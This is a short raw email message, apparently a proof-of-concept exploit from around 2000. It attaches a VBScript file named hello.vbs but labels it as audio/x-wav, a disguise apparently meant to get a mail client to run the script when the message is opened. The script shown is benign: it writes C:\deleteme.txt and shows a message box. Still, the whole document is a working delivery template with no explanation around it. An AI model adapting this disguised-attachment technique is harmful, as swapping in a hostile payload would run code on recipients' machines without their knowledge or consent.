From: "xxxxx" Subject: mail Date: Thu, 2 Nov 2000 13:27:33 +0100 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" X-Priority: 3 X-MSMail-Priority: Normal --1 Content-Type: multipart/alternative; boundary="2" --2 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I will create the file C:\deleteme.txt
--2-- --1 Content-Type: audio/x-wav; name="hello.vbs" Content-Transfer-Encoding: quoted-printable Content-ID: set objFileSystem =3D CreateObject("Scripting.FileSystemObject") set objOutputFile =3D objFileSystem.CreateTextFile("C:\deleteme.txt", 1) objOutputFile.writeline("You can delete this file.") objOutputFile.close msgbox "I have created the file : c:\deleteme.txt" --1